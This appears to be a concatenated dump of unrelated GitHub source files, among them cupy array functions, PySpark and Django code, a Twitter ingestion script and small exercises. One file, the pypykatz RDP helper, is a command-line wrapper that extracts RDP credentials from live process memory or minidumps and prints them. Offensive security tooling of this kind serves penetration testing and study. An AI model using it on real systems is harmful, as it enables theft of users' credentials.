alpha=0.4)\nplt.plot(sax_dataset_inv[0].ravel(), \"b-\")\nplt.title(\"SAX, %d symbols\" % n_sax_symbols)\n\nplt.subplot(2, 2, 4) # Finally, 1d-SAX\nplt.plot(dataset[0].ravel(), \"b-\", alpha=0.4)\nplt.plot(one_d_sax_dataset_inv[0].ravel(), \"b-\")\nplt.title(\"1d-SAX, %d symbols (%dx%d)\" % (n_sax_symbols_avg * n_sax_symbols_slope,\n n_sax_symbols_avg,\n n_sax_symbols_slope))\n\nplt.tight_layout()\nplt.show()\n","repo_name":"timothyyu/ml_monorepo","sub_path":"tslearn/tslearn/docs/examples/plot_sax.py","file_name":"plot_sax.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"21221789601","text":"import itertools\n\nimport numpy\n\nimport cupy\nfrom cupy import core\nfrom cupy.core._kernel import _get_axis\n\n\ndef flip(a, axis):\n \"\"\"Reverse the order of elements in an array along the given axis.\n\n Note that ``flip`` function has been introduced since NumPy v1.12.\n The contents of this document is the same as the original one.\n\n Args:\n a (~cupy.ndarray): Input array.\n axis (int): Axis in array, which entries are reversed.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.flip`\n\n \"\"\"\n a_ndim = a.ndim\n if a_ndim < 1:\n raise core._AxisError('Input must be >= 1-d')\n\n axis = int(axis)\n if not -a_ndim <= axis < a_ndim:\n raise core._AxisError(\n 'axis must be >= %d and < %d' % (-a_ndim, a_ndim))\n\n return _flip(a, axis)\n\n\ndef fliplr(a):\n \"\"\"Flip array in the left/right direction.\n\n Flip the entries in each row in the left/right direction. Columns\n are preserved, but appear in a different order than before.\n\n Args:\n a (~cupy.ndarray): Input array.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.fliplr`\n\n \"\"\"\n if a.ndim < 2:\n raise ValueError('Input must be >= 2-d')\n return a[::, ::-1]\n\n\ndef flipud(a):\n \"\"\"Flip array in the up/down direction.\n\n Flip the entries in each column in the up/down direction. Rows are\n preserved, but appear in a different order than before.\n\n Args:\n a (~cupy.ndarray): Input array.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. 
seealso:: :func:`numpy.flipud`\n\n \"\"\"\n if a.ndim < 1:\n raise ValueError('Input must be >= 1-d')\n return a[::-1]\n\n\ndef roll(a, shift, axis=None):\n \"\"\"Roll array elements along a given axis.\n\n Elements that roll beyond the last position are re-introduced at the first.\n\n Args:\n a (~cupy.ndarray): Array to be rolled.\n shift (int or tuple of int): The number of places by which elements are\n shifted. If a tuple, then `axis` must be a tuple of the same size,\n and each of the given axes is shifted by the corresponding number.\n If an int while `axis` is a tuple of ints, then the same value is\n used for all given axes.\n axis (int or tuple of int or None): The axis along which elements are\n shifted. By default, the array is flattened before shifting, after\n which the original shape is restored.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.roll`\n\n \"\"\"\n if axis is None:\n return roll(a.ravel(), shift, 0).reshape(a.shape)\n else:\n axis = _get_axis(axis, a.ndim)[0]\n\n broadcasted = numpy.broadcast(shift, axis)\n if broadcasted.nd > 1:\n raise ValueError(\n '\\'shift\\' and \\'axis\\' should be scalars or 1D sequences')\n shifts = {ax: 0 for ax in range(a.ndim)}\n for sh, ax in broadcasted:\n shifts[ax] += sh\n\n rolls = [((slice(None), slice(None)),)] * a.ndim\n for ax, offset in shifts.items():\n offset %= a.shape[ax] or 1 # If `a` is empty, nothing matters.\n if offset:\n # (original, result), (original, result)\n rolls[ax] = ((slice(None, -offset), slice(offset, None)),\n (slice(-offset, None), slice(None, offset)))\n\n result = cupy.empty_like(a)\n for indices in itertools.product(*rolls):\n arr_index, res_index = zip(*indices)\n result[res_index] = a[arr_index]\n\n return result\n\n\ndef rot90(a, k=1, axes=(0, 1)):\n \"\"\"Rotate an array by 90 degrees in the plane specified by axes.\n\n Note that ``axes`` argument has been introduced since NumPy v1.12.\n The contents of this document is the same as the original one.\n\n Args:\n a (~cupy.ndarray): Array of two or more dimensions.\n k (int): Number of times the array is rotated by 90 degrees.\n axes: (tuple of ints): The array is rotated in the plane defined by\n the axes. Axes must be different.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. 
seealso:: :func:`numpy.rot90`\n\n \"\"\"\n a_ndim = a.ndim\n if a_ndim < 2:\n raise ValueError('Input must be >= 2-d')\n\n axes = tuple(axes)\n if len(axes) != 2:\n raise ValueError('len(axes) must be 2')\n if axes[0] == axes[1] or abs(axes[0] - axes[1]) == a_ndim:\n raise ValueError('axes must be different')\n if not (-a_ndim <= axes[0] < a_ndim and -a_ndim <= axes[1] < a_ndim):\n raise ValueError('axes must be >= %d and < %d' % (-a_ndim, a_ndim))\n\n k = k % 4\n\n if k == 0:\n return a[:]\n if k == 2:\n return _flip(_flip(a, axes[0]), axes[1])\n\n axes_t = list(range(0, a_ndim))\n axes_t[axes[0]], axes_t[axes[1]] = axes_t[axes[1]], axes_t[axes[0]]\n\n if k == 1:\n return cupy.transpose(_flip(a, axes[1]), axes_t)\n else:\n return _flip(cupy.transpose(a, axes_t), axes[1])\n\n\ndef _flip(a, axis):\n # This function flips array without checking args.\n indexer = [slice(None)] * a.ndim\n indexer[axis] = slice(None, None, -1)\n\n return a[tuple(indexer)]\n","repo_name":"yuhc/ava-cupy","sub_path":"cupy/manipulation/rearrange.py","file_name":"rearrange.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"37436332277","text":"from collections import defaultdict\n\nimport sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\n\nfrom model import GPSTrack, db_url, Categorization\n\n\nif __name__ == '__main__':\n\n engine = sqlalchemy.create_engine(db_url(), echo=False)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n namings = defaultdict(lambda: defaultdict(set))\n\n for track in (\n session.query(GPSTrack)\n .filter(GPSTrack.source == '4sq')\n ):\n venue = track.raw.get('venue', {})\n primary_categories = [c for c in venue.get('categories', []) if c.get('primary', False)]\n primary_category = primary_categories[0]['name'] if primary_categories else None\n\n namings[primary_category][track.description].add(f\"{track.name}\")\n\n for p_c, names in namings.items():\n for name, items in names.items():\n if name == p_c:\n continue\n if len(names) == 1:\n print(f\"Always map {name} <= {p_c}: {', '.join(items)}\")\n c = Categorization(category=name, old_category=p_c)\n session.add(c)\n else:\n print(f\"Map {name} <= {', '.join(items)}\")\n for old_name in items:\n c = Categorization(category=name, old_name=old_name)\n session.add(c)\n\n session.commit()\n\n # pprint(namings, width=200)\n # pprint(sorted(names))","repo_name":"WanderingStar/gpx-cleanup","sub_path":"src/geodb/learn_categorization.py","file_name":"learn_categorization.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"1291388783","text":"from datetime import datetime\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, date_format, udf, sum, desc, row_number, avg\nfrom pyspark.sql.types import (DateType, IntegerType, FloatType, StructField,\n StructType, TimestampType, StringType)\nfrom pyspark.sql.window import Window\n\ndef main(n):\n ciclistas, rutas, actividades = cargarDatos()\n topProvincia, topKm = getTopNReports(n, ciclistas, rutas, actividades)\n\n # \"Top n by province:\"\n topProvincia.show()\n\n # \"Top n with the best daily average of km ridden\"\n topKm.show()\n\ndef cargarDatos():\n spark = SparkSession.builder.appName(\"Read Transactions\").getOrCreate()\n\n ciclista_scheme = StructType([StructField('ciclista_id', StringType()),\n StructField('nombre', StringType()),\n
StructField('provincia', StringType()),\n ])\n\n ruta_scheme = StructType([StructField('ruta_id', IntegerType()),\n StructField('ruta_nombre', StringType()),\n StructField('longitud', IntegerType()),\n ])\n\n actividad_scheme = StructType([StructField('ruta', IntegerType()),\n StructField('ciclista', StringType()),\n StructField('fecha', DateType()),\n ])\n\n ciclistas = spark.read.csv(\"/data/ciclista.csv\", schema=ciclista_scheme, header=False)\n rutas = spark.read.csv(\"/data/ruta.csv\", schema=ruta_scheme, header=False)\n actividades = spark.read.csv(\"/data/actividad.csv\", schema=actividad_scheme, header=False)\n\n return ciclistas, rutas, actividades\n\n\ndef getTopNReports(n, ciclistas, rutas, actividades):\n\n joint = joinThem(ciclistas, rutas, actividades)\n\n agregatedProvincia = getAgregatedProvincia(joint)\n agregatedKmDay = getAgregatedKmDay(joint)\n\n topProvincia = topNParticionado(n, agregatedProvincia, columnPartition=\"provincia\", orderedBy=\"total_km\")\n topKm = topN(n, agregatedKmDay, orderedBy=\"promedio_diario\")\n\n return topProvincia, topKm\n\n\ndef joinThem(ciclistas, rutas, actividades):\n joint = ciclistas \\\n .join(actividades, ciclistas.ciclista_id == actividades.ciclista, \"leftouter\") \\\n .join(rutas, actividades.ruta == rutas.ruta_id, \"leftouter\")\n \n return joint\n\n\ndef getAgregatedProvincia(joint):\n return joint.groupBy(\"provincia\", \"ciclista_id\") \\\n .agg(sum(\"longitud\").alias(\"total_km\"))\n\n\ndef getAgregatedKmDay(joint):\n return joint.groupBy(\"ciclista_id\", \"fecha\") \\\n .agg(sum(\"longitud\").alias(\"por_dia\")) \\\n .groupBy(\"ciclista_id\") \\\n .agg(avg(\"por_dia\").alias(\"promedio_diario\"))\n\n\ndef topNParticionado(n, df, columnPartition, orderedBy):\n window = Window.partitionBy(columnPartition).orderBy(col(orderedBy).desc())\n return df \\\n .fillna(value=0, subset=[orderedBy]) \\\n .withColumn(\"row\", row_number().over(window)) \\\n .filter(col(\"row\") <= n) \\\n .drop(\"row\")\n\ndef topN(n, df, orderedBy):\n return df \\\n .fillna(value=0, subset=[orderedBy]) \\\n .orderBy(col(orderedBy).desc()) \\\n .limit(n)\n","repo_name":"netor82/dataScience","sub_path":"bigData/tarea1/src/reporte.py","file_name":"reporte.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21556745885","text":"from django.shortcuts import render\nfrom .models import Book,BookInstance,Author,Genre\n\n# Create your views here.\n\ndef index(request):\n nu_of_books= Book.objects.all().count()\n nu_of_BookInstance=BookInstance.objects.all().count()\n num_instances_available = BookInstance.objects.filter(status__exact='a').count()\n num_authors = Author.objects.count()\n context = {\n 'num_books': nu_of_books,\n 'num_instances': nu_of_BookInstance,\n 'num_instances_available': num_instances_available,\n 'num_authors': num_authors,\n }\n return render(request, 'index.html', context=context)\n\n\n","repo_name":"galactus299/Web-tenology","sub_path":"django/locallibrary/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21715436882","text":"'''\r\nretrieve tweets from Twitter\r\nand embeddings from Spacy\r\nand persist in the database\r\n\r\nRJProctor\r\n'''\r\nfrom os import getenv\r\nimport tweepy\r\nfrom .models import DB, Tweet, User\r\nimport spacy\r\n\r\n\r\n# 
https://greatist.com/happiness/must-follow-twitter-accounts\r\nTWITTER_USERS = ['calebhicks', 'elonmusk', 'rrherr','SteveMartinToGo',\r\n 'alynkovic', 'nasa', 'sadserver', 'jkholand', 'austen',\r\n 'common_squirrel', 'KenJennings', 'conanobrian',\r\n 'big_ben_clock', 'IAM_SHAKESPEAR']\r\n\r\n# creates twitter object \r\n# authorized twitter API connection\r\nTWITTER_AUTH = tweepy.OAuthHandler(getenv('TWITTER_API_KEY'), \r\n getenv('TWITTER_API_KEY_SECRET'))\r\nTWITTER_AUTH.set_access_token(getenv('TWITTER_API_BEARER_TOKEN'), \r\n getenv('TWITTER_API_BEARER_TOKEN_SECRET'))\r\nTWITTER = tweepy.API(TWITTER_AUTH)\r\n\r\n\r\n# load vectorization model\r\n# to return string values as numpy arrays\r\n# for use in logistic regression model\r\n# (preprocessing)\r\nnlp = spacy.load('my_model')\r\ndef vectorize_tweet(tweet_text):\r\n return nlp(tweet_text).vector\r\n\r\n\r\n# function to add or update a user\r\n# and add their corresponding tweets\r\ndef add_or_update_user(username):\r\n '''\r\n add or update a user and their corresponding tweets\r\n return error if not a Twitter user\r\n (one function to serve them all)\r\n '''\r\n try:\r\n # define twitter user \r\n twitter_user = TWITTER.get_user(username)\r\n # query for twitter user\r\n db_user = (User.query.get(twitter_user.id) or\r\n # filter for user and update user\r\n # if user exists (if query True)\r\n User(id=twitter_user.id, name=username))\r\n # instantiate new twitter user\r\n # if no user exists (if query False)\r\n # add user to database\r\n DB.session.add(db_user)\r\n \r\n # pull tweets - limit to primary tweets \r\n # (no retweets/reply tweets)\r\n tweets = twitter_user.timeline(\r\n count=200, exclude_replies=True, include_rts=False,\r\n tweet_mode='extended', since_id=db_user.newest_tweet_id)\r\n # filters to unseen tweets\r\n \r\n # store newest tweet id\r\n if tweets:\r\n db_user.newest_tweet_id = tweets[0].id\r\n\r\n # instantiate, append to user, and add to database\r\n for tweet in tweets:\r\n # create new column/store most recent tweet\r\n # with description of tweet in user table\r\n # calculate embedding on full tweet, but truncate the text for storing\r\n vectorized_tweet = vectorize_tweet(tweet.full_text)\r\n db_tweet = Tweet(id=tweet.id, text=tweet.full_text[:300],\r\n vect=vectorized_tweet)\r\n db_user.tweets.append(db_tweet)\r\n DB.session.add(db_tweet)\r\n \r\n # persist changes to database\r\n DB.session.commit()\r\n\r\n # create exception to handle errors\r\n except Exception as e:\r\n # returns error to end user\r\n print('Error processing {}: {}'.format(username, e))\r\n # re-raise so the rest of the package knows about the exception\r\n raise e\r\n else: \r\n # save changes to database\r\n DB.session.commit()\r\n\r\n\r\n# # add data to database\r\n# def add_users():\r\n# '''\r\n# Add/update a list of users \r\n# (strings of user names).\r\n# May take awhile, so run \"offline\" \r\n# (flask shell).\r\n# '''\r\n# # add data to database\r\n# for user in users:\r\n# add_or_update_user(user)\r\n\r\n\r\n# add data to database\r\ndef update_all_users():\r\n '''\r\n Update all Tweets for all\r\n Users in the User table.\r\n '''\r\n # update all user data in database\r\n for user in User.query.all():\r\n add_or_update_user(user.name)\r\n\r\n# # add data to database\r\n# def insert_example_users():\r\n# # add sample data to database\r\n# add_or_update_user('austen')\r\n# add_or_update_user('elonmusk')\r\n","repo_name":"DS-rjp/twitoff","sub_path":"twitoff/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3754680872","text":"from collections import Counter\nfrom itertools import combinations\n\n\ndef solution(orders, course) : \n answer = []\n\n for c_length in course : \n temp = []\n\n for order in orders : \n # combinations() from itertools (builds string combinations of the requested length)\n combi = combinations(sorted(order), c_length)\n # store the string combinations in temp\n temp += list(combi)\n\n # Counter tallies the combinations (a dict-like mapping of combination -> count)\n counter = Counter(temp)\n\n # only keep values when the counter is non-empty and the most frequent combination appears at least twice\n if len(counter) != 0 and max(counter.values()) != 1 :\n for c_factor in counter : \n if counter[c_factor] == max(counter.values()) :\n # use join to merge the character tuple into a single string\n answer.append(''.join(c_factor)) \n\n return sorted(answer)","repo_name":"KB-team3/AlgoGGang","sub_path":"김태선/Week_11/P72411_메뉴 리뉴얼.py","file_name":"P72411_메뉴 리뉴얼.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"4483606316","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/7/14 16:53\n# @Author : Mamamooo\n# @Site :\n# @File : lec_725.py\n# @Software: PyCharm\n\"\"\"\nYou have a lock with four circular wheels. Each wheel has 10 digits: '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'.\nEach wheel can rotate freely and wraps around: e.g. '9' becomes '0', and '0' becomes '9'. Each move turns one wheel by one digit.\nThe lock starts at '0000', a string representing the state of the four wheels.\nThe list deadends contains a set of dead ends: if the wheels ever match any of these codes, the lock is permanently locked and can no longer be turned.\nThe string target is the code that unlocks the lock; return the minimum number of turns needed, or -1 if it is impossible to unlock.\nExample 1:\nInput: deadends = [\"0201\",\"0101\",\"0102\",\"1212\",\"2002\"], target = \"0202\"\nOutput: 6\nExplanation:\nA possible sequence of moves is \"0000\" -> \"1000\" -> \"1100\" -> \"1200\" -> \"1201\" -> \"1202\" -> \"0202\".\nNote that a sequence such as \"0000\" -> \"0001\" -> \"0002\" -> \"0102\" -> \"0202\" cannot unlock the lock,\nbecause the lock becomes stuck once it reaches \"0102\".\n\"\"\"\nimport collections\n\nclass Solution:\n def openLock(self, deadends, target):\n def neighbors(node):\n for i in range(4):\n x = int(node[i])\n for d in (-1,1):\n y = (x + d) % 10\n yield node[:i] + str(y) + node[i+1:]\n\n dead = set(deadends)\n queue = collections.deque([('0000',0)])\n seen = {'0000'}\n while queue:\n node,depth = queue.popleft()\n if node == target:\n return depth\n if node in dead:\n continue\n for nei in neighbors(node):\n if nei not in seen:\n seen.add(nei)\n queue.append((nei,depth + 1))\n return -1\n\ndeadends = [\"0201\",\"0101\",\"0102\",\"1212\",\"2002\"]\ntarget = \"0202\"\ns = Solution()\nresult = s.openLock(deadends,target)\n\nprint(result)\n\n\n\n\n\n\n\n\n","repo_name":"latata666/newcoder","sub_path":"leecode/lec_725.py","file_name":"lec_725.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39511562278","text":"# Polynomial grp 1_2\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndataset = pd.read_excel('Age polynomial regression.xlsx')\r\nX = dataset.iloc[:,:-1].values\r\ny = dataset.loc[:, 'height'].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split (X, y,\r\n test_size = 0.2)\r\n\r\n# Linear Regressor\r\nfrom sklearn.linear_model import LinearRegression\r\nlr = LinearRegression()\r\nlr.fit(X_train, y_train)\r\n\r\n# Linear regression Visualization\r\nplt.scatter(X_train, y_train, color = 'green')\r\nplt.plot(X_train, lr.predict(X_train), color = 'red')\r\nplt.title('Linear regression')\r\nplt.ylabel('Height')\r\nplt.xlabel('Age')\r\nplt.show()\r\n\r\n# Polynomial feature\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nX_poly = poly_reg.fit_transform(X_train)\r\n\r\n# Integration\r\nlr2 = LinearRegression()\r\nlr2.fit(X_poly, y_train)\r\n\r\n# Polynomial regression Visualization\r\nplt.scatter(X_train, y_train)\r\nplt.plot(X_train, lr2.predict(poly_reg.fit_transform(X_train)), color = 'green')\r\nplt.title('Polynomial regression')\r\nplt.ylabel('Height')\r\nplt.xlabel('Age')\r\nplt.show()\r\n\r\nlr2.predict(poly_reg.fit_transform([[24]]))\r\nlr2.predict(poly_reg.fit_transform([[30]]))\r\n\r\nlr.predict([[24]])\r\n\r\npred = lr2.predict(poly_reg.fit_transform(X_test))\r\n\r\nplt.scatter(X_test, y_test)\r\nplt.plot(X_test, lr2.predict(poly_reg.fit_transform(X_test)), color = 'green')\r\nplt.title('Polynomial regression')\r\nplt.ylabel('Height')\r\nplt.xlabel('Age')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sidsharma1990/PracticeUno","sub_path":"Polynomial grp 1_2.py","file_name":"Polynomial grp 1_2.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19627173912","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom ..models import Projet\nfrom ..models import UserHasProjet as Team\nfrom ..forms import TeamForm, AddUserProjectForm\nfrom django.shortcuts import get_list_or_404, get_object_or_404\nfrom django.contrib import messages\n\nfrom django.contrib.auth.decorators import login_required\nfrom ..decorators import admin_only\n@login_required(login_url='login')\n# UserHasProjets views\ndef list(request, *args, **kwargs):\n\tteams = Team.objects.all()\n\tcontext = {\n\t\t'teams':teams\n\t}\n\treturn render(request, 'team/index.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef create(request, *args, **kwargs):\n\tform = TeamForm()\n\tif request.POST:\n\t\tform = TeamForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnew = form.save(commit=False)\n\t\t\tif (not new.projet.deleted and not new.user.deleted):\n\t\t\t\tnew.save()\n\t\t\t\t# History.objects.create(content_object = new.projet, action=2, user=request.user)\n\t\t\t\tmessages.success(request, f\"Un nouvel élément a été enregistré\")\n\n\t\t\t\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\tcontext = {\n\t\t'form': form,\n\t}\n\treturn render(request, 'team/create.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef add_user(request, pk):\n\tform = AddUserProjectForm()\n\tif request.POST:\n\t\tform = AddUserProjectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tteam = form.save(commit=False)\n\t\t\tteam.projet = get_object_or_404(Projet, id=pk)\n\t\t\t# print(form)\n\t\t\t# print(form.cleaned_data.get('user_role'))\n\t\t\tteam.user_role = form.cleaned_data.get('user_role')\n\t\t\tif (not team.projet.deleted and not team.user.deleted):\n\t\t\t\tteam.save()\n\t\t\t\t# History.objects.create(content_object = team.projet, action=2, user=request.user)\n\t\t\t\tmessages.success(request, f\"Un nouvel élément a été enregistré\")\n\n\t\t\tnext = request.POST.get('next', '/')\n\t\t\treturn HttpResponseRedirect(next)\n\n\tcontext = 
{\n\t\t'form': form,\n\t}\n\treturn render(request, 'team/create.html', context=context)\n\n@login_required(login_url='login')\ndef show(request, pk):\n\tteam = get_object_or_404(Team, id=pk)\n\t\n\tcontext = {\n\t\t'team':team,\n\t}\n\treturn render(request, 'team/show.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef update(request, pk):\n\tteam = get_object_or_404(Team, id=pk)\n\tform = TeamForm(instance=team)\n\tif request.POST:\n\t\tform = TeamForm(request.POST or None, instance=team)\n\t\tif form.is_valid():\n\t\t\tteam = form.save()\n\t\t\t# History.objects.create(content_object = team.projet, action=2, user=request.user)\n\t\t\tmessages.success(request, f\"Un élément a été modifié\")\n\n\t\t\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\tcontext = {\n\t\t'form': form,\n\t}\n\treturn render(request, 'team/update.html', context=context)\n\n@login_required(login_url='login')\n@admin_only\ndef destroy(request, pk):\n\n\tteam = get_object_or_404(Team, id=pk)\n\tuser = team.user\n\tprojet = team.projet\n\t# History.objects.create(content_object = projet, action=2, user=request.user)\n\tteam.delete()\n\tmessages.success(request, f'{user} a été supprimé du projet {projet}.')\n\n\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))","repo_name":"Lizzy2106/project-management-tool","sub_path":"pjmanager/views/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23860432207","text":"import pandas as pd\n\ndf = pd.read_csv(r'sp_analysis.csv')\ntype_of_music = ['acousticness', 'danceability', 'energy', 'instrumentalness', 'liveness', 'loudness', 'speechiness', 'valence']\ntempo = df['tempo'].mean()\ngenre_num = ['acousticness', 0]\n\nfor genre in type_of_music:\n mean = df[genre].mean()\n if mean > genre_num[1]:\n genre_num[0] = genre\n genre_num[1] = mean\n\nmost_popular_song = df['popularity'].max()\ntotal_songs = df['track_number'].count()\nalbum_with_most_songs = df.groupby(['album']).count()\n\nprint(total_songs, \"songs\")\nprint(genre_num[0], \"common genre\")\n","repo_name":"victorkingi/JARVIS","sub_path":"calculate_spotify_stats.py","file_name":"calculate_spotify_stats.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70136825014","text":"\"\"\"This file contains different classes for use in the LightSequencer class\"\"\"\n\nclass Point():\n def __init__(self, X, Y):\n self.x = X\n self.y = Y\n\nclass LampList():\n def __init__(self, TimeStamp, Name, X, Y, Processed=False):\n self.timestamp = TimeStamp\n self.name = Name\n self.processed = Processed\n self.x = X\n self.y = Y\n\nclass Effect():\n def __init__(self, Name, lamplist, Length, LightTime, Repeat, Delay):\n \"\"\"setup defaults\"\"\"\n self.point1 = Point(0, 0)\n self.point2 = Point(0, 0)\n self.name = Name\n self.lampList = list()\n self.length = Length\n self.lightTime = LightTime\n self.repeat = Repeat\n self.delay = Delay\n self.loadLamps(lamplist)\n\n def loadLamps(self, lamplist):\n for key in lamplist:\n self.temp = LampList(0, key, lamplist[key]['x'], lamplist[key]['y'], False)\n self.lampList.append(self.temp)\n\nclass Light():\n \"\"\"class to hold the status and schedule of a light. 
schedule is only used if status is set to custom, else default schedules are used in code\"\"\"\n def __init__(self, Name, Status, Schedule=0xFFFFFFFF):\n self.name = Name\n self.status = Status\n self.schedule = Schedule\n\n\n\n","repo_name":"zmstauffer/id4","sub_path":"id4Modes/Effect.py","file_name":"Effect.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16681949407","text":"import re\nfrom pyspark import SparkConf, SparkContext\n\ndef normalizeWords(text):\n return re.compile(r'\\W+', re.UNICODE).split(text.lower())\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"WordCount\")\nsc = SparkContext(conf=conf)\n\ninput = sc.textFile(\"file:///sparkcourse/book.txt\")\nwords = input.flatMap(normalizeWords)\n# we could sort what countByValue() returns, but let's use RDDs to keep it scalable.\n# We could just use countByValue(), but let's do something a little harder.\nwordCounts = words.map(lambda x: (x,1)).reduceByKey(lambda x,y: x+y)\n# see - instead of calling countByValue(), we have essentially done it by hand.\n\nwordCountsSorted = wordCounts.map(lambda x: (x[1], x[0])).sortByKey()\n\nresults = wordCountsSorted.collect()\nprint(results)\nfor result in results:\n count = str(result[0])\n word = result[1].encode('ascii', 'ignore')\n if (word):\n print(word.decode() + \":\\t\\t\" + count)\n","repo_name":"BigBird123/Homework-Spark","sub_path":"word-count-better-sorted.py","file_name":"word-count-better-sorted.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42825206496","text":"from app.service.basic import BasicService\nfrom app.dao.rtokens import RTokenDAO\nimport jwt\nfrom app.constants import JWT_KEY, JWT_METHOD\n\n\nclass RTokenService(BasicService):\n def __init__(self, session):\n super().__init__(RTokenDAO(session))\n\n def del_expired(self):\n tokens = self.dao.get_all(raise_errors=False)\n for token in tokens:\n try:\n jwt.decode(token[\"token\"], JWT_KEY, [JWT_METHOD])\n except Exception as e:\n print(f\"Token with ID={token['id']} status {e}\")\n self.dao.delete(token[\"id\"])\n","repo_name":"ipotemkin/coursework3","sub_path":"app/service/rtokens.py","file_name":"rtokens.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"32425685328","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport os\nimport json\nimport glob\nimport ntpath\nimport traceback\nimport base64\n\nfrom pypykatz import logging\nfrom pypykatz.commons.common import UniversalEncoder\nfrom pypykatz.rdp.parser import RDPCredParser\n\n\n\nclass RDPCMDHelper:\n\tdef __init__(self):\n\t\tself.live_keywords = ['rdp']\n\t\tself.keywords = ['rdp']\n\t\t\n\tdef add_args(self, parser, live_parser):\n\t\tlive_group = live_parser.add_parser('rdp', help='a')\n\t\tlive_group.add_argument('--pid', type=int, help = 'Search a specific process PID for RDP creds')\n\t\tlive_group.add_argument('--all', action='store_true', help = 'Looks for all processes which use the rdp DLL')\n\n\t\tgroup = parser.add_parser('rdp', help='Parse RDP credentials from minidump file. 
Only WINVER <= Win2012')\n\t\tgroup.add_argument('cmd', choices=['minidump'])\n\t\tgroup.add_argument('memoryfile', help='path to the dump file')\n\n\tdef execute(self, args):\n\t\tif len(self.keywords) > 0 and args.command in self.keywords:\n\t\t\tself.run(args)\n\t\t\n\t\tif len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:\n\t\t\tself.run_live(args)\n\t\t\n\tdef run_live(self, args):\n\t\tcredparsers = RDPCredParser.go_live(pid = args.pid, all_rdp = args.all)\n\t\tfor credparser in credparsers:\n\t\t\tfor cred in credparser.credentials:\n\t\t\t\tprint(str(cred))\n\t\t\t\t\n\tdef run(self, args):\n\t\tcredparsers = RDPCredParser.parse_minidump_file(args.memoryfile)\n\t\tfor credparser in credparsers:\n\t\t\tfor cred in credparser.credentials:\n\t\t\t\tprint(str(cred))","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/pypykatz/pypykatz/rdp/cmdhelper.py","file_name":"cmdhelper.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"43629530030","text":"# ID: 205477003\n# Name: Sagy Krispin\n\nimport copy\nfrom utils import parser\nfrom pddlsim.parser_independent import Conjunction\n\n\"\"\"\n A copy of GoalTracking class but with a custom 'reached_all_goals' function that\n checks for goals at given state and for sub-goals aswell.\n\"\"\"\n\n\nclass GoalTrackingCustom:\n def __init__(self, services):\n self.services = services\n self.__initialize()\n\n def 